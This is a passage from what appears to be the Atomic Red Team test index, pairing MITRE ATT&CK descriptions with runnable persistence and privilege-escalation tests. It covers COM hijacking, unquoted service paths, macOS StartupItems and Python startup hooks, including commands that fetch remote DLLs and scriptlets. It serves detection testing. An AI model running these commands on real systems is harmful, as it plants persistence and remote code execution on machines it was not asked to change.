reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Authentication Packages" /t REG_MULTI_SZ /d "msv1_0\0package.dll" /f
cleanup_command: |
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Authentication Packages" /t REG_MULTI_SZ /d "msv1_0" /f
rm -force C:\windows\system32\package.dll
name: powershell
elevation_required: true
T1546.015:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae
created: '2020-03-16T14:12:47.923Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/015
external_id: T1546.015
- source_name: Elastic COM Hijacking
description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting
Persistence & Evasion with the COM. Retrieved September 15, 2016.'
url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com
- source_name: GDATA COM Hijacking
description: 'G DATA. (2014, October). COM Object hijacking: the discreet
way of persistence. Retrieved August 13, 2016.'
url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
- source_name: Microsoft Component Object Model
description: Microsoft. (n.d.). The Component Object Model. Retrieved August
18, 2016.
url: https://msdn.microsoft.com/library/ms694363.aspx
- source_name: RELIAQUEST
description: 'RELIAQUEST THREAT RESEARCH TEAM. (2025, April 11). Threat Spotlight:
Hijacked and Hidden: New Backdoor and Persistence Technique. Retrieved June
27, 2025.'
url: https://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:18.160Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
COM is a system within Windows to enable interaction between software components
through the operating system.(Citation: Microsoft Component Object Model)
\ References to various COM objects are stored in the Registry. \n\nAdversaries
may use the COM system to insert malicious code that can be executed in place
of legitimate software through hijacking the COM references and relationships
as a means for persistence. Hijacking a COM object requires a change in the
Registry to replace a reference to a legitimate system component which may
cause that component to not work when executed. When that system component
is executed through normal system operation the adversary's code will be executed
instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects
that are used frequently enough to maintain a consistent level of persistence,
but are unlikely to break noticeable functionality within the system as to
avoid system instability that could lead to detection. \n\nOne variation of
COM hijacking involves abusing Type Libraries (TypeLibs), which provide metadata
about COM objects, such as their interfaces and methods. Adversaries may modify
Registry keys associated with TypeLibs to redirect legitimate COM object functionality
to malicious scripts or payloads. Unlike traditional COM hijacking, which
commonly uses local DLLs, this variation may leverage the \"script:\" moniker
to execute remote scripts hosted on external servers.(Citation: RELIAQUEST)
This approach enables stealthy execution of code while maintaining persistence,
as the remote payload would be automatically downloaded whenever the hijacked
COM object is accessed."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Elastic
- ReliaQuest
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1546.015
atomic_tests:
- name: COM Hijacking - InprocServer32
auto_generated_guid: 48117158-d7be-441b-bc6a-d9e36e47b52b
description: |-
This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.
Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
supported_platforms:
- windows
input_arguments:
clsid_threading:
description: Threading Model
type: string
default: Apartment
dllpath:
description: Path to the DLL.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\AtomicTest.dll
clsid:
description: Class ID to hijack.
type: string
default: "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"
clsid_description:
description: Description for CLSID
type: string
default: MSAA AccPropServices
dependency_executor_name: powershell
dependencies:
- description: DLL For testing
prereq_command: if (Test-Path "#{dllpath}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}"
executor:
command: |-
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value "#{dllpath}"
New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-sta #{clsid}'
cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
-Recurse -ErrorAction Ignore
name: powershell
- name: Powershell Execute COM Object
auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb
description: |-
Use the PowerShell to execute COM CLSID object.
Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
supported_platforms:
- windows
executor:
command: |
$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
$item = $o.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
cleanup_command: 'Get-Process -Name "*calc" | Stop-Process
'
name: powershell
- name: COM Hijacking with RunDLL32 (Local Server Switch)
auto_generated_guid: 123520cc-e998-471b-a920-bd28e3feafa0
description: "This test uses PowerShell to hijack a reference to a Component
Object Model by creating registry values under InprocServer32 key in the HKCU
hive then calling the Class ID to be executed via \"rundll32.exe -localserver
[clsid]\". \nThis method is generally used as an alternative to 'rundll32.exe
-sta [clsid]' to execute dll's while evading detection. \nReference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/\nUpon
successful execution of this test with the default options, whenever certain
apps are opened (for example, Notepad), a calculator window will also be opened. "
supported_platforms:
- windows
input_arguments:
clsid_threading:
description: Threading Model
type: string
default: Both
dll_path:
description: Path to the DLL.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\T1546.015_calc.dll
clsid:
description: Class ID to hijack.
type: string
default: "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"
clsid_description:
description: Description for CLSID
type: string
default: MSAA AccPropServices
dependency_executor_name: powershell
dependencies:
- description: DLL For testing
prereq_command: if (Test-Path "#{dll_path}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}"
executor:
command: |-
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value "#{dll_path}"
New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-localserver #{clsid}'
cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
-Recurse -ErrorAction Ignore
name: powershell
- name: COM hijacking via TreatAs
auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
description: |-
This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
References:
https://youtu.be/3gz1QmiMhss?t=1251
https://github.com/enigma0x3/windows-operating-system-archaeology
supported_platforms:
- windows
executor:
command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve
/T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\"
/ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\"
/ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add
\"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T
REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
/f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
/ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
/ve /T REG_SZ /d \"C:\\WINDOWS\\system32\\scrobj.dll\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
/v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\"
/ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\"
/ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"
/f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\"
/ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"
/f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\"
/ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe
-sta \"AtomicTest\" "
cleanup_command: |-
reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
name: powershell
T1574.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
created: '2020-03-13T13:51:58.519Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/009
external_id: T1574.009
- source_name: Windows Privilege Escalation Guide
description: absolomb. (2018, January 26). Windows Privilege Escalation Guide.
Retrieved August 10, 2018.
url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- source_name: Windows Unquoted Services
description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted
Services. Retrieved August 10, 2018.
url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/
- source_name: Help eliminate unquoted path
description: Mark Baggett. (2012, November 8). Help eliminate unquoted path
vulnerabilities. Retrieved November 8, 2012.
url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464
- source_name: Microsoft CurrentControlSet Services
description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services
Registry Tree. Retrieved March 16, 2020.
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:19.228Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1574.009
atomic_tests:
- name: Execution of program.exe as service with unquoted service path
auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f
description: |
When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability
known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe.
supported_platforms:
- windows
input_arguments:
service_executable:
description: Path of the executable used for the service and as the hijacked
program.exe
type: path
default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe
executor:
command: |
copy "#{service_executable}" "C:\Program Files\windows_service.exe"
copy "#{service_executable}" "C:\program.exe"
sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto
sc start "Example Service"
cleanup_command: |
sc stop "Example Service" >nul 2>&1
sc delete "Example Service" >nul 2>&1
del "C:\Program Files\windows_service.exe" >nul 2>&1
del "C:\program.exe" >nul 2>&1
del "C:\Time.log" >nul 2>&1
name: command_prompt
elevation_required: true
T1037.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f
created: '2020-01-15T18:00:33.603Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1037/005
external_id: T1037.005
- source_name: Startup Items
description: Apple. (2016, September 13). Startup Items. Retrieved July 11,
2017.
url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
- source_name: Methods of Mac Malware Persistence
description: Patrick Wardle. (2014, September). Methods of Malware Persistence
on Mac OS X. Retrieved July 5, 2017.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:19.678Z'
name: 'Boot or Logon Initialization Scripts: Startup Items'
description: "Adversaries may use startup items automatically executed at boot
initialization to establish persistence. Startup items execute during the
final phase of the boot process and contain shell scripts or other executable
files along with configuration information used by the system to determine
the execution order for all startup items.(Citation: Startup Items)\n\nThis
is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)),
and thus the appropriate folder, /Library/StartupItems isn’t
guaranteed to exist on the system by default, but does appear to exist by
default on macOS Sierra. A startup item is a directory whose executable and
configuration property list (plist), StartupParameters.plist,
reside in the top-level directory. \n\nAn adversary can create the appropriate
folders/files in the StartupItems directory to register their own persistence
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198
description: |
Modify or create an file in /Library/StartupItems
[Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
supported_platforms:
- macos
executor:
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
'
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
'
name: sh
elevation_required: true
- name: Add launch script to launch daemon
auto_generated_guid: fc369906-90c7-4a15-86fd-d37da624dde6
description: |
Add launch script to /Library/StartupItems to launch agent
[Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
supported_platforms:
- macos
input_arguments:
path_malicious_script:
description: Name of script to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1037.005/src/T1037.005_daemon.sh"
path_malicious_plist:
description: Name of file to store in /tmp
type: string
default: "$PathToAtomicsFolder/T1037.005/src/T1037_005_daemon.plist"
path_startup_params:
description: Name of plist with startup params
type: string
default: "$PathToAtomicsFolder/T1037.005/src/StartupParameters.plist"
dependency_executor_name: bash
dependencies:
- description: "/Library/StartupItems must exist\n"
prereq_command: 'if [ ! -d /Library/StartupItems ]; then mkdir /Library/StartupItems;
exit 0; fi;
'
get_prereq_command: 'echo "Failed to create /Library/StartupItems"; exit 1;
'
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
'
- description: 'The startup script must exist on disk at specified location
(#{path_malicious_script})
'
prereq_command: 'if [ -f #{path_malicious_script} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The startup script doesn''t exist. Check the path
and try again."; exit 1;
'
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_daemon.plist
sudo /Library/StartupItems/atomic.sh start
cleanup_command: |
sudo launchctl unload /tmp/T1037_005_daemon.plist
sudo rm /tmp/T1037_005_daemon.plist
sudo rm /Library/StartupItems/atomic.sh
sudo rm /Library/StartupItems/StartupParameters.plist
sudo rm /tmp/T1037_005_daemon.txt
- name: Add launch script to launch agent
auto_generated_guid: 10cf5bec-49dd-4ebf-8077-8f47e420096f
description: |
Add launch script to /Library/StartupItems to launch agent
[Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
supported_platforms:
- macos
input_arguments:
path_malicious_script:
description: Name of script to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1037.005/src/T1037.005_agent.sh"
path_malicious_plist:
description: Name of file to store in /tmp
type: string
default: "$PathToAtomicsFolder/T1037.005/src/T1037_005_agent.plist"
path_startup_params:
description: Name of plist with startup params
type: string
default: "$PathToAtomicsFolder/T1037.005/src/StartupParameters.plist"
dependency_executor_name: bash
dependencies:
- description: "/Library/StartupItems must exist\n"
prereq_command: 'if [ ! -d /Library/StartupItems ]; then mkdir /Library/StartupItems;
exit 0; fi;
'
get_prereq_command: 'echo "Failed to create /Library/StartupItems"; exit 1;
'
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
'
- description: 'The startup script must exist on disk at specified location
(#{path_malicious_script})
'
prereq_command: 'if [ -f #{path_malicious_script} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The startup script doesn''t exist. Check the path
and try again."; exit 1;
'
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_agent.plist
/Library/StartupItems/atomic.sh start
cleanup_command: |-
sudo launchctl unload /tmp/T1037_005_agent.plist
sudo rm /tmp/T1037_005_agent.plist
sudo rm /Library/StartupItems/atomic.sh
sudo rm /Library/StartupItems/StartupParameters.plist
sudo rm /tmp/T1037_005_agent.txt
T1078.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
created: '2020-03-13T20:21:54.758Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078/002
external_id: T1078.002
- source_name: TechNet Credential Theft
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn535501.aspx
- source_name: TechNet Audit Policy
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- source_name: Microsoft AD Accounts
description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved
March 13, 2020.
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts
- source_name: Ubuntu SSSD Docs
description: Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.
url: https://ubuntu.com/server/docs/service-sssd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:21.034Z'
name: Domain Accounts
description: |-
Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '1.5'
atomic_tests: []
T1546.018:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c5087385-9b7c-4488-9923-d9e370bf08df
created: '2025-05-22T19:20:46.740Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/018
external_id: T1546.018
- source_name: Python Site Configuration Hook
description: Python. (n.d.). site — Site-specific configuration hook. Retrieved
May 22, 2025.
url: https://docs.python.org/3/library/site.html
- source_name: DFIR Python Persistence 2025
description: Stephan Berger. (2025, January 14). Analysis of Python's .pth
files as a persistence mechanism. Retrieved May 22, 2025.
url: https://dfir.ch/posts/publish_python_pth_extension/
- source_name: Volexity GlobalProtect CVE 2024
description: Volexity Threat Research. (2024, April 12). Zero-Day Exploitation
of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect
(CVE-2024-3400). Retrieved May 22, 2025.
url: https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
description: "Adversaries may achieve persistence by leveraging Python’s startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
the initialization of the Python interpreter, allowing for the execution of
arbitrary code whenever Python is invoked.(Citation: Volexity GlobalProtect
CVE 2024)\n\nPath configuration files are designed to extend Python’s module
search paths through the use of import statements. If a `.pth` file is placed
in Python's `site-packages` or `dist-packages` directories, any lines beginning
with `import` will be executed automatically on Python invocation.(Citation:
DFIR Python Persistence 2025) Similarly, if `sitecustomize.py` or `usercustomize.py`
is present in the Python path, these files will be imported during interpreter
startup, and any code they contain will be executed.(Citation: Python Site
Configuration Hook)\n\nAdversaries may abuse these mechanisms to establish
persistence on systems where Python is widely used (e.g., for automation or
scripting in production environments). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Ruben Groenewoud (@RFGroenewoud)
- Pyae Heinn Kyaw, CSIRT @ Salesforce
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
